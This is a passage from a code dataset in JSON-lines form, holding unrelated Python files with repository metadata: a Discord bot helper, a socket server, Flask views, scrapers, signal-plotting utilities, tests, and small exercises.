spoilers\n    if problem[\"tags\"] != \"[]\":\n        tags = await enclose_tags_in_spoilers(problem[\"tags\"])\n        Embed.add_field(name=\"Tags\", value=tags)\n\n    Embed.add_field(\n        name=\"Duel\",\n        value=f\"{author.display_name} vs {opponent.display_name}\",\n        inline=False,\n    )\n\n    return Embed\n\n\nasync def create_duels_embed(duels):\n    \"\"\"\n    Displays an embed with information about all ongoing duels.\n    \"\"\"\n\n    Embed = discord.Embed(\n        title=\"Ongoing duels\",\n        color=0xFF0000,\n    )\n\n    # Adding fields to embed\n    for duel in duels:\n        date = datetime.datetime.strptime(\n            duel[\"startTime\"], \"%Y-%m-%d %H:%M:%S.%f\"\n        ).strftime(\"%b %d, %Y %H:%M:%S\")\n        Embed.add_field(\n            name=f\"{duel['handle_1']} vs {duel['handle_2']}\",\n            value=f\"Problem: {PROBLEM_WEBSITE_URL}{duel['contestId']}/{duel['contestIndex']}\\nStart Time: {date} {time.tzname[0]}\",\n            inline=False,\n        )\n\n    return Embed\n","repo_name":"coniferousdyer/Botforces","sub_path":"botforces/utils/discord_common.py","file_name":"discord_common.py","file_ext":"py","file_size_in_byte":13660,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"15267411184","text":"import socket\nimport json\nimport sys\n\ndata = {\n    \"id\": 1234,\n    \"name\": \"s3ns3\",\n    \"age\": 40\n}\nsend_data = json.dumps(data)\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nhost = ''\nport = 8003\n\ns.bind((host, port))\nprint(\"Socket bound to \" + str(port))\ns.listen(5)\n\nwhile True:\n    c, addr = s.accept()\n    print(\"Connection from \" + str(addr))\n    c.sendall(bytes(send_data, encoding=\"utf-8\"))\n\n    buffer = c.recv(1024)\n    print(buffer)\n\n    # close this client connection before accepting the next one\n    c.close()\n","repo_name":"imnirfn/socket-programming-101","sub_path":"lab5/jsonserver.py","file_name":"jsonserver.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73025034749","text":"from flask import (\n    Blueprint,\n    make_response,\n    redirect,\n    render_template,\n    request,\n    Response,\n    url_for,\n)\nfrom sqlalchemy 
import desc\n\nfrom promptly.models import Chat\nfrom promptly.utils import try_parse_int\nfrom .template_filters import human_readable_date\n\nchat_bp = Blueprint('chat', __name__)\nchat_bp.add_app_template_filter(human_readable_date)\n\n\n@chat_bp.route('/', methods=['GET'])\ndef chat_index() -> Response:\n \"\"\"Redirect to the appropriate chat page based on cookie value.\n\n This function checks if a ``chat_id`` exists in cookies and if so,\n redirects the user to that specific chat page. Otherwise, a new chat page\n is rendered.\n\n :return: Redirect response or a call to :func:`.chat` function.\n :rtype: flask.Response\n \"\"\"\n chat_id = try_parse_int(request.cookies.get('chat_id'))\n if chat_id and Chat.exists(chat_id):\n return redirect(url_for('chat.chat', chat_id=chat_id))\n\n return chat()\n\n\n@chat_bp.route('/', methods=['GET'])\ndef chat(chat_id=None) -> Response:\n \"\"\"Render the chat page of the application.\n\n :param int chat_id: The ID of the chat. If not exists, a new chat is\n created.\n :return: The rendered chat page template.\n :rtype: flask.Response\n \"\"\"\n chat_instance = Chat.get(chat_id)\n if not chat_instance:\n chat_instance = Chat.create_new_chat()\n\n template = render_template(\n 'chat/chat.html',\n chat=chat_instance,\n )\n resp = make_response(template)\n resp.set_cookie('chat_id', str(chat_instance.id))\n return resp\n\n\n@chat_bp.route('/history', methods=['GET'])\ndef history() -> str:\n \"\"\"Render the chat history page of the application.\n\n :return: The rendered chat history template.\n :rtype: str\n \"\"\"\n chats = Chat.query.order_by(desc(Chat.created_at)).all()\n return render_template('chat/history.html', chats=chats)\n","repo_name":"sergeyklay/promptly","sub_path":"backend/promptly/chat/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"70321406907","text":"import numpy as np\nfrom scipy.misc import imread, imsave, imresize\nfrom os import listdir\nimport scipy.fftpack\n\n\ndef list_files(directory, extension):\n return (f for f in listdir(directory) if f.endswith('.' 
+ extension))\n\n\ndef write_files():\n raw_image_file_names = list_files(\"../Dataset_V02/Training/\", \"png\")\n i = 0\n for file_name in raw_image_file_names:\n i += 1\n img = imread(\"../Dataset_V02/Training/\" + file_name)\n img = imresize(img, [200, 400])\n imsave(\"../Resized_Dataset_V02/Training/\" + file_name, img)\n if i % 20 == 0:\n print(\"image\", str(i), \"processed\")\n\n\ndef main():\n write_files()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"lorenz-h/DataRepresentationLearning","sub_path":"Old Experiments/Juli/DuckieLanesV2/Utilities/DL_Generate_Downscaled_Dataset.py","file_name":"DL_Generate_Downscaled_Dataset.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"41068852952","text":"from collections import defaultdict\nfrom os import path\nfrom pprint import pprint as pp\n\nwith open('input/12.in', 'r') as in_file:\n lines = list(map(str.strip, in_file.readlines()))\n link = defaultdict(list)\n for line in lines:\n fr, to = line.split('-')\n link[fr].append(to)\n link[to].append(fr)\n\nprint(link)\n\n\ndef dfs(start, visited: set = {'start'}, doneTwice: bool = False, current_path=[]):\n if start == 'end':\n return [current_path + [start]]\n\n paths = []\n\n for node in link[start]:\n if node == 'start':\n continue\n\n if node in visited and doneTwice:\n continue\n\n newDoneTwice = doneTwice or node in visited\n\n new_visted = visited.union({start}) if start[0].islower() else visited\n paths += dfs(node,\n visited=new_visted,\n doneTwice=newDoneTwice,\n current_path=current_path + [start])\n\n return paths\n\n\npaths = dfs('start')\nprint(len(paths))","repo_name":"vasylenson/aoc-2021","sub_path":"python/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8764169512","text":"import pytest\n\nfrom mel.scanning.stream import CharStream\n\n\n# BEGIN TESTS ==================================\n\ndef test_empty_text_is_eof():\n stream = CharStream()\n assert stream.get().is_eof()\n\n\ndef test_empty_text_has_zero_length():\n stream = CharStream()\n assert len(stream) == 0\n\n\ndef test_stream_length():\n stream = CharStream('abc')\n assert len(stream) == 3\n\n\ndef test_empty_text_char_type():\n stream = CharStream()\n assert stream.get().is_eof()\n\n\n@pytest.mark.parametrize('test_input, method', [\n ('a', 'is_lower'),\n ('h', 'is_lower'),\n ('z', 'is_lower'),\n ('A', 'is_upper'),\n ('M', 'is_upper'),\n ('Z', 'is_upper'),\n ('0', 'is_digit'),\n ('1', 'is_digit'),\n ('5', 'is_digit'),\n ('9', 'is_digit'),\n (' ', 'is_space'),\n ('\\t', 'is_space'),\n ('\\a', 'is_space'),\n ('\\b', 'is_space'),\n ('\\v', 'is_space'),\n ('\\r', 'is_space'),\n ('%', 'is_symbol'),\n ('*', 'is_symbol'),\n ('_', 'is_symbol'),\n ('\"', 'is_symbol'),\n ('\\n', 'is_newline'),\n ('é', 'is_other'),\n ('ó', 'is_other'),\n ('¨', 'is_other'),\n ('£', 'is_other'),\n ('ã', 'is_other')\n])\ndef test_char_type(test_input, method):\n stream = CharStream(test_input)\n ch = stream.get()\n assert getattr(ch, method)()\n\n\ndef test_char_line():\n text = 'ab\\nc\\n\\nd'\n stream = CharStream(text)\n lines = [stream.get(i).line for i, _ in enumerate(text)]\n assert lines == [0, 0, 0, 1, 1, 2, 3]\n\n\ndef test_char_column():\n text = 'ab\\nc\\n\\nd'\n stream = CharStream(text)\n lines = [stream.get(i).column for i, _ in enumerate(text)]\n assert lines == [0, 1, 2, 0, 1, 0, 0]\n\n\ndef 
test_char_values():\n text = 'i76hj-'\n stream = CharStream(text)\n values = ''.join([\n stream.get(i).value\n for i, _ in enumerate(text)\n ])\n assert values == text\n\n\ndef test_is_next_char():\n stream = CharStream('a3')\n assert stream.get(0).value == 'a'\n assert not stream.get(1).value == 'C'\n assert stream.get(1).value == '3'\n","repo_name":"hacktoon/mel","sub_path":"tests/scanning/test_stream.py","file_name":"test_stream.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"6"} +{"seq_id":"23399894502","text":"import nextcord\r\nfrom nextcord.ext import commands\r\nfrom nextcord import Interaction, ButtonStyle\r\nfrom nextcord.ui import Button, View\r\n\r\nfrom config.config_handler import ConfigHandler\r\nfrom components.embeds.help_embed import CreateHelpEmbed\r\n\r\nclass Help(commands.Cog):\r\n\r\n config_handler = ConfigHandler()\r\n \r\n def __init__(self, bot: commands.Bot):\r\n self.bot = bot\r\n \r\n @nextcord.slash_command(\r\n name = \"help\",\r\n description = \"ЁЯФи Obten ayuda sobre mis comandos\",\r\n guild_ids = config_handler.get_CaC_server_id()\r\n )\r\n \r\n async def invite_command(self, ctx: Interaction):\r\n \r\n currentPage = 0\r\n \r\n nextButton = Button(label = \"тПня╕П\", style = ButtonStyle.blurple)\r\n previousButton = Button(label = \"тПоя╕П\", style = ButtonStyle.blurple)\r\n \r\n async def next_callback(interaction):\r\n nonlocal currentPage, send\r\n currentPage += 1\r\n \r\n await send.edit(embed = CreateHelpEmbed(pagNum = currentPage), view=helpView)\r\n \r\n async def previous_callback(interaction):\r\n nonlocal currentPage, send\r\n currentPage -= 1\r\n \r\n await send.edit(embed = CreateHelpEmbed(pagNum = currentPage), view=helpView)\r\n \r\n nextButton.callback = next_callback\r\n previousButton.callback = previous_callback\r\n \r\n helpView = View(timeout = 300)\r\n helpView.add_item(previousButton)\r\n helpView.add_item(nextButton)\r\n \r\n \r\n send = await ctx.response.send_message(embed = CreateHelpEmbed(pagNum=0), view=helpView)\r\n \r\ndef setup(client):\r\n client.add_cog(Help(client))","repo_name":"Worcer/ASF","sub_path":"amanecer sin fronteras/src/commands/info/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"6626445234","text":"horas = input().split(\" \")\n\na, b = horas\n\nif int(a) >= int(b):\n b = int(b) + 24\n dur = int(b) - int(a)\n print(\"O JOGO DUROU {} HORA(S)\".format(int(dur)))\nelse:\n dur = int(a) - int(b)\n dur = abs(dur)\n print(\"O JOGO DUROU {} HORA(S)\".format(int(dur)))","repo_name":"jonathasfsilva/python","sub_path":"uri-exercises/1046_tempo_jogo.py","file_name":"1046_tempo_jogo.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"37579938981","text":"#!/usr/bin/env python\n# license removed for brevity\nimport rospy\nfrom std_msgs.msg import String\n\n\ndef main_baxter_display():\n pub1 = rospy.Publisher('/launch_display', String, queue_size=100)\n \n rospy.init_node('main_publisher', anonymous=True)\n rate = rospy.Rate(100) # 10hz\n rate.sleep()\n print(\"hello\")\n while not rospy.is_shutdown():\n pub1.publish('/home/bashira/catkin_ws/baxterworking_text.jpg')\n\n # rospy.spin()\n rate.sleep()\n # if __name__ == '__main__':\n # try:\n # talker()\n # except rospy.ROSInterruptException:\n # 
pass\n\n\n","repo_name":"anima-unr/Distributed_Collaborative_Task_Tree_GA_learning_executing","sub_path":"launching_file_from_web/src/publishing_command_display.py","file_name":"publishing_command_display.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"25792918502","text":"from bs4 import BeautifulSoup;\nimport regex as re;\nimport xlsxwriter;\nfrom openpyxl import load_workbook;\nfrom selenium import webdriver;\nfrom selenium.webdriver.support.ui import WebDriverWait as wait\nimport dishcategorizer\nimport random;\nimport addrestaurantstosheet\n\n# This parses menu sites written in javascript by using marionette browsers. Download gecko and place it in the same path as me.\n# 3/27/2019\n\n#########################################################################\n\n# if you leave these blank the console will just ask you to input them. Do whichever you feel like\nurlList = []\nworkbookName = \"\"\n\n\n#########################################################################\n\n##Soup functions\ndef getAddress(soup):\n address = \"\"\n for s in soup:\n if s.p:\n address = s.p.text\n # TODO: Make this more flexible\n if 'NW' in address or 'SW' in address or \"Northwest\" in address or \"Street\" in address or \"ave\" in address:\n return address\n try:\n address = soup.p\n except:\n print('fail')\n pass\n\n return 'Address not found!'\n\n\ndef getType(dishCategory):\n dishType = dishCategory.findAll(class_=\"category-name\")\n return dishType\n\n\ndef getNames(dishCategory):\n dishNames1 = dishCategory.findAll('span', itemprop='name')\n # crams all the cleaning in one line, fuck readability\n dishNames = [dish.text.split(\"(\")[0] for dish in dishNames1]\n return dishNames\n\n\ndef getDescriptions(dishCategory):\n dishDescriptions1 = dishCategory.findAll('meta', itemprop='description')\n dishDescriptions = [x['content'] for x in dishDescriptions1]\n return dishDescriptions\n\n\n# Regex Functions\ndef makeItRegEx(aList):\n regExList = []\n for word in aList:\n regExList.append(word)\n return \"|\".join(regExList)\n\n\ndef stripText(text):\n text = \" \".join(text.split(\",\"))\n text = \" \".join(text.split('.'))\n text = \" \".join(text.split('('))\n text = \" \".join(text.split(')'))\n text = \" \".join(text.split('\"'))\n text = \" \".join(text.split('-'))\n text = \" \".join(text.split(':')).lower()\n return text\n\n\ndef plantCatcher(dishDescription):\n try:\n dishDescription1 = dishDescription.string.lower().strip()\n except:\n dishDescription1 = dishDescription.lower().strip()\n\n dishDescription1 = stripText(dishDescription1)\n veggieWords = [\"vegan\", \"veggie\", \"vegetarian\", \"soy\", \"choice of\", \"faux\", \"plant\"]\n vegan = re.findall(makeItRegEx(veggieWords), dishDescription1)\n if vegan:\n return vegan[0]\n\n\ndef veganCatcher(dishDescription):\n try:\n dishDescription1 = dishDescription.string.lower().strip()\n except:\n dishDescription1 = dishDescription.lower().strip()\n\n dishDescription1 = stripText(dishDescription1)\n\n dairyWords = [\"cheese\", \"cream\", \"butter\", \"cheese\", \"parmesan\", \"cheddar\", \"mozzarella\", \"ricotta\", \"feta\"]\n eggsWords = [\"egg\", \"omelette\", \"meringue\", \"yolk\"]\n otherWords = [\"honey\"]\n dairy = re.findall(makeItRegEx(dairyWords), dishDescription1)\n eggs = re.findall(makeItRegEx(eggsWords), dishDescription1)\n honey = re.findall(makeItRegEx(otherWords), dishDescription1)\n if dairy:\n return dairy[0]\n elif eggs:\n 
return eggs[0]\n elif honey:\n return honey[0]\n\n\ndef meatCatcher(dishDescription):\n try:\n dishDescription1 = dishDescription.string\n except:\n dishDescription1 = dishDescription\n\n dishDescription1 = stripText(dishDescription1)\n\n chickenWords = ['chicken', 'breast', 'leg', 'thigh', 'drumstick', 'wing']\n cowWords = ['beef', 'steak', 'sausage', 'rib', 'veal']\n pigWords = ['pig', 'pork', 'ham', 'bacon', 'veal', 'prosciutto', 'pancetta', 'boar']\n seaWords = [\"bass\", \"fish\", \"seafood\", \"clams\", \"mussel\", \"lobster\", \"octopus\", \"squid\", \"calamari\", \"scallop\",\n \"shrimp\", \"salmon\", \"prawn\", \"crab\", \"eel\", \"tuna\", \"mackerel\", \"mackrel\"]\n otherWords = [\"bison\", \"meat\", \"lamb\", \"turkey\", \"quail\", \"rabbit\", \"venison\", \"duck\", \"pepperoni\"]\n\n chicken = re.findall(makeItRegEx(chickenWords), dishDescription1)\n cow = re.findall(makeItRegEx(cowWords), dishDescription1)\n pig = re.findall(makeItRegEx(pigWords), dishDescription1)\n sea = re.findall(makeItRegEx(seaWords), dishDescription1)\n other = re.findall(makeItRegEx(otherWords), dishDescription1)\n\n if chicken:\n return chicken[0]\n elif pig:\n return pig[0]\n elif cow:\n return cow[0]\n elif sea:\n return sea[0]\n elif other:\n return other[0]\n\n\ndef glutenCatcher(websiteText):\n dishDescription1 = ''.join(websiteText.findAll(text=True)).strip()\n dishDescription1 = stripText(dishDescription1)\n gluten = re.search(r'\\bgluten\\b', dishDescription1)\n # we now try to find the 50 chars before, after the word \"gluten\" to give it some context - are there really gluten free options?\n\n if gluten:\n n = (gluten.start())\n m = n - 50\n z = n + 150\n\n glutenContext = dishDescription1[m:z]\n dishDescription1.split()\n return glutenContext\n else:\n return False\n\n\n# Code begins #\nif workbookName == \"\":\n workbookName = input(\"Enter workbook name (including .xlsx): \")\nuserInput = \"\"\nyes = \"y\"\nif not urlList:\n while userInput.lower() != \"ok\":\n userInput = input(\"Paste a Skip restaurant URL (enter 'ok' when done): \")\n if \"http\" in userInput:\n urlList.append(userInput)\n\ntry:\n load_workbook(filename=workbookName)\n yes = input(\"This workbook already exists. Overwrite? (y/n)): \")\n\nexcept:\n if yes == \"y\":\n pass\n else:\n raise\n input(\"Aborting mission! 
Enter any key to continue\")\n\nworkbook = xlsxwriter.Workbook(workbookName)\nprint(\"Restaurant info loading...\")\nrestaurantNames = []\nfor url in urlList:\n # TODO: uuughhhhh\n print(\"Now scraping at URL: \" + url)\n\n browser = webdriver.Firefox(executable_path='/Users/hazelfoerstner/Desktop/Edibly/menustuff/geckodriver')\n page = browser.get(url)\n\n restaurantName = \\\n wait(browser, 10).until(lambda browser: browser.find_element_by_xpath(\"//meta[@itemprop='brand']\")).get_attribute(\n \"content\").split(\"(\")[0]\n soup_level1 = BeautifulSoup(browser.page_source, 'lxml')\n soup = soup_level1.find_all('div')\n\n try:\n worksheetName = restaurantName[0:26].strip()\n worksheet = workbook.add_worksheet(worksheetName + '.xlsx')\n restaurantNames.append(restaurantName.strip())\n except:\n x = random.randint(1, 99)\n x = str(x)\n worksheetName = restaurantName[0:23] + x + '.xlsx'\n worksheet = workbook.add_worksheet(worksheetName + x + '.xlsx')\n\n # formatting\n bold = workbook.add_format({'bold': True})\n wrapItUp = workbook.add_format()\n wrapItUp.set_text_wrap()\n worksheet.set_column('A:A', 20)\n worksheet.set_column('B:C', 50)\n worksheet.set_column('F:G', 50)\n worksheet.set_column('G:H', 150)\n\n veganColor = workbook.add_format()\n veganColor.set_bg_color('lime')\n veggieColor = workbook.add_format()\n veggieColor.set_bg_color('yellow')\n\n # gluten = glutenCatcher(soup)\n # if gluten:\n # worksheet.write(3, 7, gluten, wrapItUp)\n\n # No gluten for skip, I don't feel like figuring this out\n\n divs = []\n dishTypes = []\n\n for div in soup:\n titles = div.findAll('h6')\n if titles != [] and titles[0].text not in dishTypes:\n dishTypes.append(titles[0].text)\n divs.append(div)\n divs.pop(0)\n dishTypes.pop(0)\n row = 3\n col = 0\n\n n = 1\n categoryIs = 0\n\n for dishCategory in divs:\n dishType = dishTypes[categoryIs]\n categoryIs += 1\n dishNames = getNames(dishCategory)\n dishDescriptions = getDescriptions(dishCategory)\n\n # write type of dish, i.e. 
antipasti\n worksheet.write(row, col, dishType, wrapItUp)\n\n # this guy gets rid of any extra titles in the beginning, like \"Pizza is fresh made in-house\".\n while len(dishDescriptions) > len(dishNames):\n dishDescriptions.pop(0)\n while len(dishNames) > len(dishDescriptions):\n dishNames.pop(0)\n\n # this writes the dishes and dish descriptions in\n for dish in dishNames:\n worksheet.write(row, col + 1, dish, wrapItUp)\n n = dishNames.index(dish)\n # only some dishes have descriptions.\n try:\n dishDescription = dishDescriptions[n]\n except:\n dishDescription = \"No description given.\"\n\n # Priority for regex:\n # non-veg names < non-veg descriptions < veg names < veg descriptions\n vegan = veganCatcher(dishDescription)\n meat = meatCatcher(dishDescription)\n plant = plantCatcher(dishDescription)\n if vegan == None:\n vegan = veganCatcher(dish)\n if meat == None:\n meat = meatCatcher(dish)\n if plant == None:\n plant = plantCatcher(dish)\n if not plant:\n worksheet.write(row, 4, meat)\n worksheet.write(row, 3, meat)\n worksheet.write(row, 3, vegan)\n worksheet.write(row, col + 2, dishDescription, wrapItUp)\n else:\n worksheet.write(row, 4, plant, veganColor)\n worksheet.write(row, 3, plant, veganColor)\n worksheet.write(row, col + 2, dishDescription, wrapItUp)\n worksheet.set_row(row, None, veganColor)\n\n if not meat:\n if not vegan:\n worksheet.set_row(row, None, veganColor)\n else:\n worksheet.set_row(row, None, veggieColor)\n row += 1\n\n # Write some data headers.\n worksheet.write('A1', restaurantName, bold)\n worksheet.write('B1', \"Url: \" + url, bold)\n worksheet.write('A2', 'Category', bold)\n worksheet.write('B2', 'Name', bold)\n worksheet.write('C2', \"Description\", bold)\n worksheet.write('D2', \"Vegan\", bold)\n worksheet.write('E2', \"Veggie\", bold)\n worksheet.write('F2', \"Type\", bold)\n worksheet.write('G2', \"Restaurant Info\", bold);\n worksheet.write('H2', \"Gluten info\", bold);\n address = getAddress(soup)\n worksheet.write('G3', address);\n worksheet.write('G4', \"Edmonton, AB\");\n worksheet.write('G5', \"Image URL\");\n worksheet.write('G6', \"Restaurant tip here\");\n worksheet.write('G7', \"Manager or owner info here (name, phone number, email)\");\n\n print(\"Excel sheet written to new sheet: \" + worksheetName + \"!\")\n\nworkbook.close()\ndishcategorizer.run(workbookName)\nprint(\"Closing workbook \" + workbookName)\ninput(\"Enter any key to finish running\")","repo_name":"hazelf42/menu-scraper","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":10743,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"11376907216","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution(object):\n def isPalindrome(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: bool\n \"\"\"\n l = []\n while head:\n l.append(head.val)\n head = head.next\n \n print(l)\n\n for i in range(0, len(l)-1):\n if l[i] != l[len(l)-1-i]:\n return False\n return True\n\n ","repo_name":"Miti29/Leetcode","sub_path":"0234-palindrome-linked-list/0234-palindrome-linked-list.py","file_name":"0234-palindrome-linked-list.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"4596014516","text":"from website.models import ReflectedXssModule, DomBasedXssModule, StoredXssModule\nfrom 
django.contrib.auth.models import User\nfrom django.shortcuts import get_object_or_404\nfrom django.http import Http404\n\n# function to update challenge completition progress\n# challenge_progress_number is progress in binary 1=first challenge, 11=second challenge, 111, third challenge etc.\ndef update_user_progress(request, challenge_progress_number):\n\n list = request.path.split('/')\n\n module_name = list[-2]\n\n user = User.objects.get(id=request.user.id)\n module = get_module_or_none(module_name, user)\n \n # update module progress in binary 1=first challenge, 11=second challenge, 111, third challenge etc.\n int_challenge_progress_number = int(challenge_progress_number,2)\n if module.challenge_completition < int_challenge_progress_number:\n module.challenge_completition = int_challenge_progress_number\n module.save() \n\n\n# get correct module object by module_name, returns None if object does not exsist\ndef get_module_or_none(module_name, user):\n if module_name == 'reflected_xss':\n return ReflectedXssModule.objects.filter(user=user).first()\n elif module_name == 'dom_based_xss':\n return DomBasedXssModule.objects.filter(user=user).first()\n elif module_name == 'stored_xss':\n return StoredXssModule.objects.filter(user=user).first()\n else:\n raise Exception(f'We have no module named {module_name}')\n\n# check if challenge has been completed, returns boolean\ndef challenge_completed(request, required_completition_number):\n list = request.path.split('/')\n module_name = list[-2]\n\n user = get_object_or_404(User, id=request.user.id)\n try:\n module = get_module_or_none(module_name, user)\n except:\n raise Http404\n int_required_completition_number = int(required_completition_number,2)\n if module.challenge_completition >= int_required_completition_number:\n return True\n else:\n return False\n\n# returns true if there is a need to display rules to user(if any module is started return false)\n\ndef read_rules(user):\n if ReflectedXssModule.objects.filter(user = user).exists() or DomBasedXssModule.objects.filter(user = user).exists() or StoredXssModule.objects.filter(user = user).exists():\n return False\n else:\n return True","repo_name":"PDastych/XSS_APP","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"10620796756","text":"import requests\nimport re\n\ndef director_scrap(pageid):\n # Make the request\n r = requests.get(f'https://en.wikipedia.org/w/api.php?action=query&prop=revisions&rvprop=content&pageids={pageid}&format=json') \n\n # Convert the response to JSON\n data = r.json()\n\n # Check if page is missing\n if 'missing' in data['query']['pages'][str(pageid)]:\n return None\n\n # Check if revisions key exists\n if 'revisions' not in data['query']['pages'][str(pageid)]:\n return None\n\n # Extract the wikitext content of the page\n wikitext = data['query']['pages'][str(pageid)]['revisions'][0]['*']\n\n # Use a regular expression to extract the director's name\n pattern = r'\\|\\s*director\\s*=\\s*(?:(?:{{(?:ubl|Plainlist)\\|)?\\[\\[)?([^\\]|<\\n\\[{]+)'\n match = re.search(pattern, wikitext)\n\n if match:\n director = match.group(1).split('|')[-1].strip()\n\n # Clean up the name to remove any content within parentheses\n director = re.sub(r'\\s*\\([^)]+\\)', '', director)\n\n if not director: # Check if the extracted director name is empty\n return None\n\n return director\n else:\n return 
None\n","repo_name":"epfl-ada/ada-2023-project-patterndetectives","sub_path":"code/director_scrap.py","file_name":"director_scrap.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"9271767137","text":"nome = 'Eduardo Bueno da Silva'\naltura = 1.71\npeso = 90\nimc = peso / (altura * altura)\n\n''' f-strings '''\nlinha_1 = f'{nome}, tem, {altura} de altura,'\nlinha_2 = f'pesa, {peso} quilos e seu IMC é {imc:.2f}'\n\nprint(linha_1)\nprint(linha_2)","repo_name":"ebssolucoescorporativas/Curso_Python","sub_path":"aula12.py","file_name":"aula12.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"18354761910","text":"import numpy as np\nfrom scipy import signal\nimport pandas as pd\nimport pyedflib as el\nfrom datetime import datetime, timedelta\nfrom matplotlib import pyplot as pp\nimport seaborn as sns\npp.rcParams['figure.figsize'] = (16.0, 8.0)\n\ndef plot_signal_fragment(\n csv_sig, edf_sig, seconds=10, shift=0,\n csv_title='NeuroOn signal',\n edf_title='Aura PSG signal'\n):\n '''\n Simple function used to plot two signals, based on their timestamps.\n '''\n plotting_series = [\n [211, csv_title, csv_sig],\n [212, edf_title, edf_sig]\n ]\n for series in plotting_series:\n pp.subplot(series[0])\n pp.title(series[1])\n signal = series[2]\n time_slice = np.logical_and(\n signal['timestamp'] >= signal['timestamp'][0] + timedelta(seconds=shift),\n signal['timestamp'] < signal['timestamp'][0] + timedelta(seconds=shift + seconds)\n )\n x_axis = signal['timestamp'][time_slice]\n y_axis = signal['signal'][time_slice]\n pp.plot(x_axis, y_axis)\n return pp.show()\n\ndef plot_spectrum_fragment(\n csv_sig, edf_sig, seconds=10, shift=0,\n cap_frequency=False,\n csv_title='NeuroOn spectrum',\n edf_title='Aura PSG spectrum'\n):\n '''\n Simple function used to plot spectrum of two signals, based on their timestamps.\n '''\n plotting_series = [\n [211, csv_title, csv_sig],\n [212, edf_title, edf_sig]\n ]\n for series in plotting_series:\n pp.subplot(series[0])\n pp.title(series[1])\n signal = series[2]\n signal_freq = len(signal[\n signal['timestamp'] < signal['timestamp'][0] + timedelta(seconds=1)\n ])\n time_slice = np.logical_and(\n signal['timestamp'] >= signal['timestamp'][0] + timedelta(seconds=shift),\n signal['timestamp'] < signal['timestamp'][0] + timedelta(seconds=shift + seconds)\n )\n signal_len = len(signal[time_slice])\n signal_y = signal[time_slice]['signal']\n spectrum_y = np.fft.fft(signal_y) / signal_len\n spectrum_x = np.arange(signal_len) / (signal_len / signal_freq)\n half_spectrum = int(signal_len / 2)\n x_axis = spectrum_x[:half_spectrum]\n y_axis = abs(spectrum_y[:half_spectrum])\n if (cap_frequency):\n pp.xlim(0, cap_frequency)\n pp.plot(x_axis, y_axis)\n pp.show()\n\n\ndef plot_spectrum_fragment(\n csv_sig, edf_sig,\n seconds=10,\n shift=0,\n initial_timestamp=False,\n cap_frequency=False,\n csv_title='NeuroOn signal',\n csv_label='NeuroOn spectrum',\n edf_title='Aura PSG signal',\n edf_label='Aura PSG spectrum'\n):\n '''\n Plot two signals on separate subplots and their spectrum on a third one.\n Based on timestamps.\n '''\n plotting_series = [\n {\n 'subplot': 221,\n 'title': csv_title,\n 'label': csv_label,\n 'signal': csv_sig,\n 'color': sns.xkcd_rgb['denim blue']\n },\n {\n 'subplot': 222,\n 'title': edf_title,\n 'label': edf_label,\n 'signal': edf_sig,\n 'color': 
sns.xkcd_rgb['medium green']\n }\n ]\n if not initial_timestamp:\n csv_init_ts = csv_sig.timestamp[0]\n edf_init_ts = edf_sig.timestamp[0]\n initial_timestamp = csv_init_ts if csv_init_ts > edf_init_ts else edf_init_ts\n for series in plotting_series:\n pp.subplot(series['subplot'])\n pp.title(series['title'])\n signal = series['signal']\n color = series['color']\n signal_freq = len(signal[\n signal['timestamp'] < signal['timestamp'][0] + timedelta(seconds=1)\n ])\n time_slice = np.logical_and(\n signal['timestamp'] >= initial_timestamp + timedelta(seconds=shift),\n signal['timestamp'] < initial_timestamp + timedelta(seconds=shift + seconds)\n )\n signal_len = len(signal[time_slice])\n signal_y = signal[time_slice]['signal']\n signal_x = signal[time_slice]['timestamp']\n pp.plot(signal_x, signal_y, color)\n pp.subplot(212)\n spectrum_y = np.fft.fft(signal_y) / signal_len\n spectrum_x = np.arange(signal_len) / (signal_len / signal_freq)\n half_spectrum = int(signal_len / 2)\n x_axis = spectrum_x[:half_spectrum]\n y_axis = abs(spectrum_y[:half_spectrum])\n if (cap_frequency):\n pp.xlim(0, cap_frequency)\n pp.plot(x_axis, y_axis, color, label=series['label'])\n pp.legend()\n 